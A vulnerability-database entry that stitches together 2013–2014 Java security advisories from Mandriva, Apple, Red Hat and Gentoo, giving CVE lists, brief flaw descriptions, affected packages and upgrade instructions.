All the vulnerabilites related to juniper - nsm3000
var-201310-0612
Vulnerability from variot
Unspecified vulnerability in Oracle Java SE 7u40 and earlier, Java SE 6u60 and earlier, Java SE 5.0u51 and earlier, JRockit R28.2.8 and earlier, JRockit R27.7.6 and earlier, and Java SE Embedded 7u40 and earlier allows remote attackers to affect confidentiality, integrity, and availability via vectors related to JAXP. The vulnerability can be exploited over multiple protocols. This issue affects the 'JAXP' sub-component. In a typical operating environment, these are of low security risk as the runtime is not used on untrusted applets.
This updates IcedTea6 to version 1.11.14, which fixes these issues, as well as several others. The verification of md5 checksums and GPG signatures is performed automatically for you.
All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing:
gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98
You can view other update advisories for Mandriva Linux at:
http://www.mandriva.com/en/support/security/advisories/
If you want to report vulnerabilities, please contact
security_(at)_mandriva.com
Type Bits/KeyID Date User ID
pub 1024D/22458A98 2000-07-10 Mandriva Security Team
iD8DBQFSiycxmqjQ0CJFipgRAgEDAKDflCdAJCTeaiQlfwCT2ypkKWxMAQCguZqZ JVNYykKzXuNiMTc7JATPYjA= =20DS -----END PGP SIGNATURE----- .
Background
IcedTea is a distribution of the Java OpenJDK source code built with free build tools. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1
APPLE-SA-2013-10-15-1 Java for OS X 2013-005 and Mac OS X v10.6 Update 17
Java for OS X 2013-005 and Mac OS X v10.6 Update 17 is now available and addresses the following:
Java Available for: Mac OS X v10.6.8, Mac OS X Server v10.6.8, OS X Lion v10.7 or later, OS X Lion Server v10.7 or later, OS X Mountain Lion 10.8 or later Impact: Multiple vulnerabilities in Java 1.6.0_51 Description: 8011782 Multiple vulnerabilities existed in Java 1.6.0_51, the most serious of which may allow an untrusted Java applet to execute arbitrary code outside the Java sandbox. Further information is available via the Java website at ht tp://www.oracle.com/technetwork/java/javase/releasenotes-136954.html CVE-ID CVE-2013-3829 CVE-2013-4002 CVE-2013-5772 CVE-2013-5774 CVE-2013-5776 CVE-2013-5778 CVE-2013-5780 CVE-2013-5782 CVE-2013-5783 CVE-2013-5784 CVE-2013-5787 CVE-2013-5789 CVE-2013-5790 CVE-2013-5797 CVE-2013-5801 CVE-2013-5802 CVE-2013-5803 CVE-2013-5804 CVE-2013-5809 CVE-2013-5812 CVE-2013-5814 CVE-2013-5817 CVE-2013-5818 CVE-2013-5819 CVE-2013-5820 CVE-2013-5823 CVE-2013-5824 CVE-2013-5825 CVE-2013-5829 CVE-2013-5830 CVE-2013-5831 CVE-2013-5832 CVE-2013-5840 CVE-2013-5842 CVE-2013-5843 CVE-2013-5848 CVE-2013-5849 CVE-2013-5850
Java for OS X 2013-005 and Mac OS X v10.6 Update 17 may be obtained from the Software Update pane in System Preferences, Mac App Store, or Apple's Software Downloads web site: http://www.apple.com/support/downloads/
For Mac OS X v10.6 systems The download file is named: JavaForMacOSX10.6update17.dmg Its SHA-1 digest is: 5dfe7eaebf9726352c97964da61d57fa28246c08
For OS X Lion and Mountain Lion systems The download file is named: JavaForOSX2013-005.dmg Its SHA-1 digest is: ce78f9a916b91ec408c933bd0bde5973ca8a2dc4
Information will also be posted to the Apple Security Updates web site: http://support.apple.com/kb/HT1222
This message is signed with Apple's Product Security PGP key, and details are available at: https://www.apple.com/support/security/pgp/
-----BEGIN PGP SIGNATURE----- Version: GnuPG/MacGPG2 v2.0.17 (Darwin) Comment: GPGTools - http://gpgtools.org
iQIcBAEBAgAGBQJSXYc6AAoJEPefwLHPlZEwD8EP/3aN1h4wIM/BjidF3ZY+PXf3 Lzgtb8yAxh03A+J3NJCd3BKmjINXIo9Wwt9aUTktEz4UefvpF+rIsgKSinotvQt0 TmtsYPItFgs83Lj2IFBpCLurM+O0fUhje+mvVzR/KA7kHvrtXYRC5w2plWh32Smm D4Ejh8odeR0IU3OdWV5MJpcRoRpRySX16JOEJc76SIE0+sbOLHZ90rmzyPMB0S2u jZRq8qY3DJS9C5De97gh8F/V76fV8Aiq6RwGPs9m+tJUCJe6XLEy8Wq/G3jlKXyr +KrradRl9Bz5oTUnVDlN9odoOGZ/J4nq4xs0RyN08uETKcw6315+7UTP3B+hD8IM 1YyWeceCd8oHtWlR/02spwaku5ctxiUZpqXQ8DxDH3e8dONBfndfmKGUnywQSFd8 vCgZR0SQgSbhtD/UnNGW9VgJsxKgO4gi17aVD/B9LYmMztsSB+wPkg96uTR6J7yh +ogJqYeOGsMvvQd8XY++ig1bhEsfzzauEWnq3G4WG8E+Fep+5RHZewxnhzakapqW 2z7byXHNXtIP2cxL//DG/x4ed+gAWzKxZyPDPSrltw162mkJk/6mTedtpead4LH8 Ooi4Cf1HMbC9gdRBdtGNWo7EN9kr9rpajuRWjqxT5uTLAgJusKk5UnSO2KJtromy Los4PbyC//yRidZKynqx =I3n5 -----END PGP SIGNATURE----- . Further information about these flaws can be found on the Oracle Java SE Critical Patch Update Advisory pages, listed in the References section. should be restricted package (CORBA, 8025022) 1053495 - CVE-2014-0410 Oracle JDK: unspecified vulnerability fixed in 6u71 and 7u51 (Deployment) 1053496 - CVE-2014-0415 Oracle JDK: unspecified vulnerability fixed in 6u71 and 7u51 (Deployment) 1053499 - CVE-2013-5889 Oracle JDK: unspecified vulnerability fixed in 6u71 and 7u51 (Deployment) 1053501 - CVE-2014-0417 Oracle JDK: unspecified vulnerability fixed in 5.0u71, 6u71 and 7u51 (2D) 1053502 - CVE-2014-0387 Oracle JDK: unspecified vulnerability fixed in 6u71 and 7u51 (Deployment) 1053504 - CVE-2014-0424 Oracle JDK: unspecified vulnerability fixed in 6u71 and 7u51 (Deployment) 1053507 - CVE-2014-0403 Oracle JDK: unspecified vulnerability fixed in 6u71 and 7u51 (Deployment) 1053508 - CVE-2014-0375 Oracle JDK: unspecified vulnerability fixed in 6u71 and 7u51 (Deployment) 1053509 - CVE-2013-5905 Oracle JDK: unspecified vulnerability fixed in 5.0u71, 6u71 and 7u51 (Install) 1053510 - CVE-2013-5906 Oracle JDK: unspecified vulnerability fixed in 5.0u71, 6u71 and 7u51 (Install) 1053512 - CVE-2013-5902 Oracle JDK: unspecified vulnerability fixed in 6u71 and 7u51 (Deployment) 1053513 - CVE-2014-0418 Oracle JDK: unspecified vulnerability fixed in 6u71 and 7u51 (Deployment) 1053515 - CVE-2013-5887 Oracle JDK: unspecified vulnerability fixed in 6u71 and 7u51 (Deployment) 1053516 - CVE-2013-5899 Oracle JDK: unspecified vulnerability fixed in 6u71 and 7u51 (Deployment) 1053517 - CVE-2013-5888 Oracle JDK: unspecified vulnerability fixed in 6u71 and 7u51 (Deployment) 1053518 - CVE-2013-5898 Oracle JDK: unspecified vulnerability fixed in 6u71 and 7u51 (Deployment) 1060907 - CVE-2014-1876 OpenJDK: insecure temporary file use in unpack200 (Libraries, 8033618) 1086632 - CVE-2014-2398 OpenJDK: insufficient escaping of window title string (Javadoc, 8026736) 1086645 - CVE-2014-0453 OpenJDK: RSA unpadding timing issues (Security, 8027766) 1087409 - CVE-2014-0429 OpenJDK: Incorrect mlib/raster image validation (2D, 8027841) 1087411 - CVE-2014-0457 OpenJDK: ServiceLoader Exception handling security bypass (Libraries, 8031394) 1087413 - CVE-2014-0456 OpenJDK: System.arraycopy() element race condition (Hotspot, 8029858) 1087417 - CVE-2014-2421 OpenJDK: JPEG decoder input stream handling (2D, 8029854) 1087426 - CVE-2014-0461 OpenJDK: Better ScriptEngineManager ScriptEngine management (Libraries, 8036794) 1087427 - CVE-2014-2412 OpenJDK: AWT thread context handling (AWT, 8025010) 1087428 - CVE-2014-0451 OpenJDK: AWT incorrect FlavorMap seperation (AWT, 8026797) 1087430 - CVE-2014-0458 OpenJDK: Activation framework default command map caching (JAX-WS, 8025152) 1087431 - CVE-2014-2414 OpenJDK: incorrect caching of data initialized via TCCL (JAXB, 8025030) 1087434 - CVE-2014-2423 OpenJDK: incorrect caching of data initialized via TCCL (JAXWS, 8026188) 1087436 - CVE-2014-0452 OpenJDK: incorrect caching of data initialized via TCCL (JAXWS, 8026801) 1087439 - CVE-2014-0446 OpenJDK: Protect logger handlers (Libraries, 8029740) 1087441 - CVE-2014-2427 OpenJDK: remove insecure Java Sound provider caching (Sound, 8026163) 1087442 - CVE-2014-0460 OpenJDK: missing randomization of JNDI DNS client query IDs (JNDI, 8030731) 1087443 - CVE-2014-2403 OpenJDK: JAXP CharInfo file access restriction (JAXP, 8029282) 1088025 - CVE-2014-2428 Oracle JDK: unspecified vulnerability fixed in 6u75, 7u55 and 8u5 (Deployment) 1088027 - CVE-2014-2409 Oracle JDK: unspecified vulnerability fixed in 6u75, 7u55 and 8u5 (Deployment) 1088028 - CVE-2014-0449 Oracle JDK: unspecified vulnerability fixed in 6u75, 7u55 and 8u5 (Deployment) 1088030 - CVE-2014-2401 Oracle JDK: unspecified vulnerability fixed in 5.0u75, 6u75, 7u55 and 8u5 (2D) 1088031 - CVE-2014-2420 Oracle JDK: unspecified vulnerability fixed in 6u75, 7u55 and 8u5 (Deployment)
- -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1
===================================================================== Red Hat Security Advisory
Synopsis: Important: java-1.6.0-openjdk security update Advisory ID: RHSA-2013:1505-01 Product: Red Hat Enterprise Linux Advisory URL: https://rhn.redhat.com/errata/RHSA-2013-1505.html Issue date: 2013-11-05 CVE Names: CVE-2013-3829 CVE-2013-4002 CVE-2013-5772 CVE-2013-5774 CVE-2013-5778 CVE-2013-5780 CVE-2013-5782 CVE-2013-5783 CVE-2013-5784 CVE-2013-5790 CVE-2013-5797 CVE-2013-5802 CVE-2013-5803 CVE-2013-5804 CVE-2013-5809 CVE-2013-5814 CVE-2013-5817 CVE-2013-5820 CVE-2013-5823 CVE-2013-5825 CVE-2013-5829 CVE-2013-5830 CVE-2013-5840 CVE-2013-5842 CVE-2013-5849 CVE-2013-5850 =====================================================================
- Summary:
Updated java-1.6.0-openjdk packages that fix various security issues are now available for Red Hat Enterprise Linux 5 and 6.
The Red Hat Security Response Team has rated this update as having important security impact. Common Vulnerability Scoring System (CVSS) base scores, which give detailed severity ratings, are available for each vulnerability from the CVE links in the References section.
- Relevant releases/architectures:
Red Hat Enterprise Linux (v. 5 server) - i386, x86_64 Red Hat Enterprise Linux Desktop (v. 5 client) - i386, x86_64 Red Hat Enterprise Linux Desktop (v. 6) - i386, x86_64 Red Hat Enterprise Linux Desktop Optional (v. 6) - i386, x86_64 Red Hat Enterprise Linux HPC Node (v. 6) - x86_64 Red Hat Enterprise Linux HPC Node Optional (v. 6) - x86_64 Red Hat Enterprise Linux Server (v. 6) - i386, x86_64 Red Hat Enterprise Linux Server Optional (v. 6) - i386, x86_64 Red Hat Enterprise Linux Workstation (v. 6) - i386, x86_64 Red Hat Enterprise Linux Workstation Optional (v. 6) - i386, x86_64
- Description:
The java-1.6.0-openjdk packages provide the OpenJDK 6 Java Runtime Environment and the OpenJDK 6 Java Software Development Kit.
Multiple input checking flaws were found in the 2D component native image parsing code. A specially crafted image file could trigger a Java Virtual Machine memory corruption and, possibly, lead to arbitrary code execution with the privileges of the user running the Java Virtual Machine. (CVE-2013-5782)
The class loader did not properly check the package access for non-public proxy classes. A remote attacker could possibly use this flaw to execute arbitrary code with the privileges of the user running the Java Virtual Machine. (CVE-2013-5830)
Multiple improper permission check issues were discovered in the 2D, CORBA, JNDI, and Libraries components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass Java sandbox restrictions. (CVE-2013-5829, CVE-2013-5814, CVE-2013-5817, CVE-2013-5842, CVE-2013-5850)
Multiple input checking flaws were discovered in the JPEG image reading and writing code in the 2D component. An untrusted Java application or applet could use these flaws to corrupt the Java Virtual Machine memory and bypass Java sandbox restrictions. (CVE-2013-5809)
The FEATURE_SECURE_PROCESSING setting was not properly honored by the javax.xml.transform package transformers. A remote attacker could use this flaw to supply a crafted XML that would be processed without the intended security restrictions. (CVE-2013-5802)
Multiple errors were discovered in the way the JAXP and Security components processes XML inputs. A remote attacker could create a crafted XML that would cause a Java application to use an excessive amount of CPU and memory when processed. (CVE-2013-5825, CVE-2013-4002, CVE-2013-5823)
Multiple improper permission check issues were discovered in the Libraries, Swing, JAX-WS, JGSS, AWT, Beans, and Scripting components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass certain Java sandbox restrictions. (CVE-2013-3829, CVE-2013-5840, CVE-2013-5774, CVE-2013-5783, CVE-2013-5820, CVE-2013-5849, CVE-2013-5790, CVE-2013-5784)
It was discovered that the 2D component image library did not properly check bounds when performing image conversions. An untrusted Java application or applet could use this flaw to disclose portions of the Java Virtual Machine memory. (CVE-2013-5778)
Multiple input sanitization flaws were discovered in javadoc. When javadoc documentation was generated from an untrusted Java source code and hosted on a domain not controlled by the code author, these issues could make it easier to perform cross-site scripting attacks. (CVE-2013-5804, CVE-2013-5797)
Various OpenJDK classes that represent cryptographic keys could leak private key information by including sensitive data in strings returned by toString() methods. These flaws could possibly lead to an unexpected exposure of sensitive key data. (CVE-2013-5780)
The Java Heap Analysis Tool (jhat) failed to properly escape all data added into the HTML pages it generated. Crafted content in the memory of a Java program analyzed using jhat could possibly be used to conduct cross-site scripting attacks. (CVE-2013-5772)
The Kerberos implementation in OpenJDK did not properly parse KDC responses. A malformed packet could cause a Java application using JGSS to exit. (CVE-2013-5803)
All users of java-1.6.0-openjdk are advised to upgrade to these updated packages, which resolve these issues. All running instances of OpenJDK Java must be restarted for the update to take effect.
- Solution:
Before applying this update, make sure all previously released errata relevant to your system have been applied.
This update is available via the Red Hat Network. Details on how to use the Red Hat Network to apply this update are available at https://access.redhat.com/site/articles/11258
- Bugs fixed (http://bugzilla.redhat.com/):
1018713 - CVE-2013-5803 OpenJDK: insufficient checks of KDC replies (JGSS, 8014341) 1018717 - CVE-2013-5772 OpenJDK: insufficient html escaping in jhat (jhat, 8011081) 1018720 - CVE-2013-5797 OpenJDK: insufficient escaping of window title string (Javadoc, 8016675) 1018727 - CVE-2013-5784 OpenJDK: insufficient InterfaceImplementor security checks (Scripting, 8017299) 1018736 - CVE-2013-5790 OpenJDK: insufficient security checks (Beans, 8012071) 1018750 - CVE-2013-5849 OpenJDK: insufficient DataFlavor security checks (AWT, 8012277) 1018785 - CVE-2013-5780 OpenJDK: key data leak via toString() methods (Libraries, 8011071) 1018831 - CVE-2013-5840 OpenJDK: getDeclaringClass() information leak (Libraries, 8014349) 1018972 - CVE-2013-5820 OpenJDK: insufficient security checks (JAXWS, 8017505) 1018984 - CVE-2013-5778 OpenJDK: image conversion out of bounds read (2D, 8014102) 1019108 - CVE-2013-5782 OpenJDK: Incorrect awt_getPixelByte/awt_getPixelShort/awt_setPixelByte/awt_setPixelShort image raster checks (2D, 8014093) 1019110 - CVE-2013-5830 OpenJDK: checkPackageAccess missing security check (Libraries, 8017291) 1019113 - CVE-2013-5809 OpenJDK: JPEGImageReader and JPEGImageWriter missing band size checks (2D, 8013510) 1019115 - CVE-2013-5829 OpenJDK: Java2d Disposer security bypass (2D, 8017287) 1019117 - CVE-2013-5814 OpenJDK: RMIConnection stub missing permission check (CORBA, 8011157) 1019118 - CVE-2013-5817 OpenJDK: VersionHelper12 does not honor modifyThreadGroup restriction (JNDI, 8013739) 1019123 - CVE-2013-5842 OpenJDK: ObjectInputStream/ObjectOutputStream missing checks (Libraries, 8014987) 1019127 - CVE-2013-5850 OpenJDK: Missing CORBA security checks (Libraries, 8017196) 1019130 - CVE-2013-5802 OpenJDK: javax.xml.transform.TransformerFactory does not properly honor XMLConstants.FEATURE_SECURE_PROCESSING (JAXP, 8012425) 1019131 - CVE-2013-5804 OpenJDK: javac does not ignore certain ignorable characters (Javadoc, 8016653) 1019133 - CVE-2013-3829 OpenJDK: java.util.TimeZone does not restrict setting of default time zone (Libraries, 8001029) 1019137 - CVE-2013-5783 OpenJDK: JTable not properly performing certain access checks (Swing, 8013744) 1019139 - CVE-2013-5825 OpenJDK: XML parsing Denial of Service (JAXP, 8014530) 1019145 - CVE-2013-5823 OpenJDK: com.sun.org.apache.xml.internal.security.utils.UnsyncByteArrayOutputStream Denial of Service (Security, 8021290) 1019147 - CVE-2013-5774 OpenJDK: Inet6Address class IPv6 address processing errors (Libraries, 8015743) 1019176 - CVE-2013-4002 OpenJDK: XML parsing Denial of Service (JAXP, 8017298)
- Package List:
Red Hat Enterprise Linux Desktop (v. 5 client):
Source: ftp://ftp.redhat.com/pub/redhat/linux/enterprise/5Client/en/os/SRPMS/java-1.6.0-openjdk-1.6.0.0-1.42.1.11.14.el5_10.src.rpm
i386: java-1.6.0-openjdk-1.6.0.0-1.42.1.11.14.el5_10.i386.rpm java-1.6.0-openjdk-debuginfo-1.6.0.0-1.42.1.11.14.el5_10.i386.rpm java-1.6.0-openjdk-demo-1.6.0.0-1.42.1.11.14.el5_10.i386.rpm java-1.6.0-openjdk-devel-1.6.0.0-1.42.1.11.14.el5_10.i386.rpm java-1.6.0-openjdk-javadoc-1.6.0.0-1.42.1.11.14.el5_10.i386.rpm java-1.6.0-openjdk-src-1.6.0.0-1.42.1.11.14.el5_10.i386.rpm
x86_64: java-1.6.0-openjdk-1.6.0.0-1.42.1.11.14.el5_10.x86_64.rpm java-1.6.0-openjdk-debuginfo-1.6.0.0-1.42.1.11.14.el5_10.x86_64.rpm java-1.6.0-openjdk-demo-1.6.0.0-1.42.1.11.14.el5_10.x86_64.rpm java-1.6.0-openjdk-devel-1.6.0.0-1.42.1.11.14.el5_10.x86_64.rpm java-1.6.0-openjdk-javadoc-1.6.0.0-1.42.1.11.14.el5_10.x86_64.rpm java-1.6.0-openjdk-src-1.6.0.0-1.42.1.11.14.el5_10.x86_64.rpm
Red Hat Enterprise Linux (v. 5 server):
Source: ftp://ftp.redhat.com/pub/redhat/linux/enterprise/5Server/en/os/SRPMS/java-1.6.0-openjdk-1.6.0.0-1.42.1.11.14.el5_10.src.rpm
i386: java-1.6.0-openjdk-1.6.0.0-1.42.1.11.14.el5_10.i386.rpm java-1.6.0-openjdk-debuginfo-1.6.0.0-1.42.1.11.14.el5_10.i386.rpm java-1.6.0-openjdk-demo-1.6.0.0-1.42.1.11.14.el5_10.i386.rpm java-1.6.0-openjdk-devel-1.6.0.0-1.42.1.11.14.el5_10.i386.rpm java-1.6.0-openjdk-javadoc-1.6.0.0-1.42.1.11.14.el5_10.i386.rpm java-1.6.0-openjdk-src-1.6.0.0-1.42.1.11.14.el5_10.i386.rpm
x86_64: java-1.6.0-openjdk-1.6.0.0-1.42.1.11.14.el5_10.x86_64.rpm java-1.6.0-openjdk-debuginfo-1.6.0.0-1.42.1.11.14.el5_10.x86_64.rpm java-1.6.0-openjdk-demo-1.6.0.0-1.42.1.11.14.el5_10.x86_64.rpm java-1.6.0-openjdk-devel-1.6.0.0-1.42.1.11.14.el5_10.x86_64.rpm java-1.6.0-openjdk-javadoc-1.6.0.0-1.42.1.11.14.el5_10.x86_64.rpm java-1.6.0-openjdk-src-1.6.0.0-1.42.1.11.14.el5_10.x86_64.rpm
Red Hat Enterprise Linux Desktop (v. 6):
Source: ftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Client/en/os/SRPMS/java-1.6.0-openjdk-1.6.0.0-1.65.1.11.14.el6_4.src.rpm
i386: java-1.6.0-openjdk-1.6.0.0-1.65.1.11.14.el6_4.i686.rpm java-1.6.0-openjdk-debuginfo-1.6.0.0-1.65.1.11.14.el6_4.i686.rpm
x86_64: java-1.6.0-openjdk-1.6.0.0-1.65.1.11.14.el6_4.x86_64.rpm java-1.6.0-openjdk-debuginfo-1.6.0.0-1.65.1.11.14.el6_4.x86_64.rpm
Red Hat Enterprise Linux Desktop Optional (v. 6):
Source: ftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Client/en/os/SRPMS/java-1.6.0-openjdk-1.6.0.0-1.65.1.11.14.el6_4.src.rpm
i386: java-1.6.0-openjdk-debuginfo-1.6.0.0-1.65.1.11.14.el6_4.i686.rpm java-1.6.0-openjdk-demo-1.6.0.0-1.65.1.11.14.el6_4.i686.rpm java-1.6.0-openjdk-devel-1.6.0.0-1.65.1.11.14.el6_4.i686.rpm java-1.6.0-openjdk-javadoc-1.6.0.0-1.65.1.11.14.el6_4.i686.rpm java-1.6.0-openjdk-src-1.6.0.0-1.65.1.11.14.el6_4.i686.rpm
x86_64: java-1.6.0-openjdk-debuginfo-1.6.0.0-1.65.1.11.14.el6_4.x86_64.rpm java-1.6.0-openjdk-demo-1.6.0.0-1.65.1.11.14.el6_4.x86_64.rpm java-1.6.0-openjdk-devel-1.6.0.0-1.65.1.11.14.el6_4.x86_64.rpm java-1.6.0-openjdk-javadoc-1.6.0.0-1.65.1.11.14.el6_4.x86_64.rpm java-1.6.0-openjdk-src-1.6.0.0-1.65.1.11.14.el6_4.x86_64.rpm
Red Hat Enterprise Linux HPC Node (v. 6):
Source: ftp://ftp.redhat.com/pub/redhat/linux/enterprise/6ComputeNode/en/os/SRPMS/java-1.6.0-openjdk-1.6.0.0-1.65.1.11.14.el6_4.src.rpm
x86_64: java-1.6.0-openjdk-1.6.0.0-1.65.1.11.14.el6_4.x86_64.rpm java-1.6.0-openjdk-debuginfo-1.6.0.0-1.65.1.11.14.el6_4.x86_64.rpm
Red Hat Enterprise Linux HPC Node Optional (v. 6):
Source: ftp://ftp.redhat.com/pub/redhat/linux/enterprise/6ComputeNode/en/os/SRPMS/java-1.6.0-openjdk-1.6.0.0-1.65.1.11.14.el6_4.src.rpm
x86_64: java-1.6.0-openjdk-debuginfo-1.6.0.0-1.65.1.11.14.el6_4.x86_64.rpm java-1.6.0-openjdk-demo-1.6.0.0-1.65.1.11.14.el6_4.x86_64.rpm java-1.6.0-openjdk-devel-1.6.0.0-1.65.1.11.14.el6_4.x86_64.rpm java-1.6.0-openjdk-javadoc-1.6.0.0-1.65.1.11.14.el6_4.x86_64.rpm java-1.6.0-openjdk-src-1.6.0.0-1.65.1.11.14.el6_4.x86_64.rpm
Red Hat Enterprise Linux Server (v. 6):
Source: ftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Server/en/os/SRPMS/java-1.6.0-openjdk-1.6.0.0-1.65.1.11.14.el6_4.src.rpm
i386: java-1.6.0-openjdk-1.6.0.0-1.65.1.11.14.el6_4.i686.rpm java-1.6.0-openjdk-debuginfo-1.6.0.0-1.65.1.11.14.el6_4.i686.rpm java-1.6.0-openjdk-devel-1.6.0.0-1.65.1.11.14.el6_4.i686.rpm java-1.6.0-openjdk-javadoc-1.6.0.0-1.65.1.11.14.el6_4.i686.rpm
x86_64: java-1.6.0-openjdk-1.6.0.0-1.65.1.11.14.el6_4.x86_64.rpm java-1.6.0-openjdk-debuginfo-1.6.0.0-1.65.1.11.14.el6_4.x86_64.rpm java-1.6.0-openjdk-devel-1.6.0.0-1.65.1.11.14.el6_4.x86_64.rpm java-1.6.0-openjdk-javadoc-1.6.0.0-1.65.1.11.14.el6_4.x86_64.rpm
Red Hat Enterprise Linux Server Optional (v. 6):
Source: ftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Server/en/os/SRPMS/java-1.6.0-openjdk-1.6.0.0-1.65.1.11.14.el6_4.src.rpm
i386: java-1.6.0-openjdk-debuginfo-1.6.0.0-1.65.1.11.14.el6_4.i686.rpm java-1.6.0-openjdk-demo-1.6.0.0-1.65.1.11.14.el6_4.i686.rpm java-1.6.0-openjdk-src-1.6.0.0-1.65.1.11.14.el6_4.i686.rpm
x86_64: java-1.6.0-openjdk-debuginfo-1.6.0.0-1.65.1.11.14.el6_4.x86_64.rpm java-1.6.0-openjdk-demo-1.6.0.0-1.65.1.11.14.el6_4.x86_64.rpm java-1.6.0-openjdk-src-1.6.0.0-1.65.1.11.14.el6_4.x86_64.rpm
Red Hat Enterprise Linux Workstation (v. 6):
Source: ftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Workstation/en/os/SRPMS/java-1.6.0-openjdk-1.6.0.0-1.65.1.11.14.el6_4.src.rpm
i386: java-1.6.0-openjdk-1.6.0.0-1.65.1.11.14.el6_4.i686.rpm java-1.6.0-openjdk-debuginfo-1.6.0.0-1.65.1.11.14.el6_4.i686.rpm java-1.6.0-openjdk-devel-1.6.0.0-1.65.1.11.14.el6_4.i686.rpm java-1.6.0-openjdk-javadoc-1.6.0.0-1.65.1.11.14.el6_4.i686.rpm
x86_64: java-1.6.0-openjdk-1.6.0.0-1.65.1.11.14.el6_4.x86_64.rpm java-1.6.0-openjdk-debuginfo-1.6.0.0-1.65.1.11.14.el6_4.x86_64.rpm java-1.6.0-openjdk-devel-1.6.0.0-1.65.1.11.14.el6_4.x86_64.rpm java-1.6.0-openjdk-javadoc-1.6.0.0-1.65.1.11.14.el6_4.x86_64.rpm
Red Hat Enterprise Linux Workstation Optional (v. 6):
Source: ftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Workstation/en/os/SRPMS/java-1.6.0-openjdk-1.6.0.0-1.65.1.11.14.el6_4.src.rpm
i386: java-1.6.0-openjdk-debuginfo-1.6.0.0-1.65.1.11.14.el6_4.i686.rpm java-1.6.0-openjdk-demo-1.6.0.0-1.65.1.11.14.el6_4.i686.rpm java-1.6.0-openjdk-src-1.6.0.0-1.65.1.11.14.el6_4.i686.rpm
x86_64: java-1.6.0-openjdk-debuginfo-1.6.0.0-1.65.1.11.14.el6_4.x86_64.rpm java-1.6.0-openjdk-demo-1.6.0.0-1.65.1.11.14.el6_4.x86_64.rpm java-1.6.0-openjdk-src-1.6.0.0-1.65.1.11.14.el6_4.x86_64.rpm
These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/#package
- References:
https://www.redhat.com/security/data/cve/CVE-2013-3829.html https://www.redhat.com/security/data/cve/CVE-2013-4002.html https://www.redhat.com/security/data/cve/CVE-2013-5772.html https://www.redhat.com/security/data/cve/CVE-2013-5774.html https://www.redhat.com/security/data/cve/CVE-2013-5778.html https://www.redhat.com/security/data/cve/CVE-2013-5780.html https://www.redhat.com/security/data/cve/CVE-2013-5782.html https://www.redhat.com/security/data/cve/CVE-2013-5783.html https://www.redhat.com/security/data/cve/CVE-2013-5784.html https://www.redhat.com/security/data/cve/CVE-2013-5790.html https://www.redhat.com/security/data/cve/CVE-2013-5797.html https://www.redhat.com/security/data/cve/CVE-2013-5802.html https://www.redhat.com/security/data/cve/CVE-2013-5803.html https://www.redhat.com/security/data/cve/CVE-2013-5804.html https://www.redhat.com/security/data/cve/CVE-2013-5809.html https://www.redhat.com/security/data/cve/CVE-2013-5814.html https://www.redhat.com/security/data/cve/CVE-2013-5817.html https://www.redhat.com/security/data/cve/CVE-2013-5820.html https://www.redhat.com/security/data/cve/CVE-2013-5823.html https://www.redhat.com/security/data/cve/CVE-2013-5825.html https://www.redhat.com/security/data/cve/CVE-2013-5829.html https://www.redhat.com/security/data/cve/CVE-2013-5830.html https://www.redhat.com/security/data/cve/CVE-2013-5840.html https://www.redhat.com/security/data/cve/CVE-2013-5842.html https://www.redhat.com/security/data/cve/CVE-2013-5849.html https://www.redhat.com/security/data/cve/CVE-2013-5850.html https://access.redhat.com/security/updates/classification/#important
- Contact:
The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/
Copyright 2013 Red Hat, Inc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.4 (GNU/Linux)
iD8DBQFSeT/AXlSAg2UNWIIRAvBKAJ9vGve+1MyOR8lyLQffhBtOlcmxrgCfVKad ebAHvPvYFmwsG11PQeLu+bI= =+ckf -----END PGP SIGNATURE-----
-- RHSA-announce mailing list RHSA-announce@redhat.com https://www.redhat.com/mailman/listinfo/rhsa-announce . - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 201401-30
http://security.gentoo.org/
Severity: High Title: Oracle JRE/JDK: Multiple vulnerabilities Date: January 27, 2014 Bugs: #404071, #421073, #433094, #438706, #451206, #455174, #458444, #460360, #466212, #473830, #473980, #488210, #498148 ID: 201401-30
Synopsis
Multiple vulnerabilities have been found in the Oracle JRE/JDK, allowing attackers to cause unspecified impact.
Affected packages
-------------------------------------------------------------------
Package / Vulnerable / Unaffected
-------------------------------------------------------------------
1 dev-java/sun-jdk <= 1.6.0.45 Vulnerable! 2 dev-java/oracle-jdk-bin < 1.7.0.51 >= 1.7.0.51 * 3 dev-java/sun-jre-bin <= 1.6.0.45 Vulnerable! 4 dev-java/oracle-jre-bin < 1.7.0.51 >= 1.7.0.51 * 5 app-emulation/emul-linux-x86-java < 1.7.0.51 >= 1.7.0.51 * ------------------------------------------------------------------- NOTE: Certain packages are still vulnerable. Users should migrate to another package if one is available or wait for the existing packages to be marked stable by their architecture maintainers. ------------------------------------------------------------------- NOTE: Packages marked with asterisks require manual intervention! ------------------------------------------------------------------- 5 affected packages
Description
Multiple vulnerabilities have been reported in the Oracle Java implementation. Please review the CVE identifiers referenced below for details.
Workaround
There is no known workaround at this time.
Resolution
All Oracle JDK 1.7 users should upgrade to the latest version:
# emerge --sync # emerge --ask --oneshot -v ">=dev-java/oracle-jdk-bin-1.7.0.51"
All Oracle JRE 1.7 users should upgrade to the latest version:
# emerge --sync # emerge --ask --oneshot -v ">=dev-java/oracle-jre-bin-1.7.0.51"
All users of the precompiled 32-bit Oracle JRE should upgrade to the latest version:
# emerge --sync # emerge -a -1 -v ">=app-emulation/emul-linux-x86-java-1.7.0.51"
All Sun Microsystems JDK/JRE 1.6 users are suggested to upgrade to one of the newer Oracle packages like dev-java/oracle-jdk-bin or dev-java/oracle-jre-bin or choose another alternative we provide; eg. the IBM JDK/JRE or the open source IcedTea.
References
